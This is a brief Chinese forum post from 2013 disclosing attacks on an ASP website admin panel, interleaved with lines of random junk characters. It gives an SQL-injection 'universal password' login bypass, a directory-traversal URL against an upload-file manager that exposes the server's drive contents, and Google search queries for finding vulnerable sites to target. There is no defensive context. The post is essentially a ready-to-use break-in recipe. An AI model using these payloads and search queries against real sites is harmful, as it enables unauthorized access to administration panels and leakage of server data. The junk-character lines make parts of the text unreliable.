后台万能密码 'or'='or'
1 L+ _5 d7 C6 W. r9 u6 Z
$ v# c3 M, g/ T. h后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
4 t) ?9 {0 J r# z7 Wadmin/uploadfile.asp?currentFolder=/upfiles/../
. Z' a- Y8 d2 R. W
0 `. c4 G5 N0 C4 ]$ ^- l3 }7 S漏洞证明:$ { W( _. S" w7 B4 s/ H
0 o" {9 E" s" q. i4 j/ b
谷歌:inurl:type.asp?id=1 新闻中心
9 r: ]! g6 z$ C6 c* V. g; B或者 :inurl:download_ok.asp?5 S7 j/ D# U) j# M, v
% g6 _) z* s3 \* G% Z |
发表于 2013-3-14 20:17:32
收藏
支持
反对